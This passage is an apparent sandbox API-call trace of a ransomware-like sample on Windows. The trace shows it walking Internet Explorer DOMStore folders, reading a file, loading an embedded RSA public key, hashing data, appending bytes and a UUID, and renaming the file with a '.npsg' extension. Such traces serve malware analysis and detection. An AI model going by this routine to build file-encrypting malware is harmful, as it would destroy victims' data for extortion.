Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393e80 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393e80 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fec8 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fec8 | out: hHeap=0x620000) returned 1 [0246.259] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.260] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.260] PathFindFileNameW (pszPath="") returned="" [0246.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.261] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.261] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0246.261] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.261] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.261] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0246.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0246.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0246.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0246.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0246.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0246.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0246.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0246.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.263] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0246.263] PathFindFileNameW (pszPath="") returned="" [0246.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0246.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.263] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.263] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 1 [0246.263] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0246.263] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.265] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=836) returned 1 [0246.265] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.267] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.267] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.268] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x344, lpOverlapped=0x0) returned 1 [0246.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.269] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.270] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.270] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.270] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.270] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.270] GetLastError () returned 0x0 [0246.270] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.270] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.270] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.270] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.270] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.270] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0246.270] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.270] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.271] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.271] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.271] CloseHandle (hObject=0x644) returned 1 [0246.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0246.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0246.272] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet 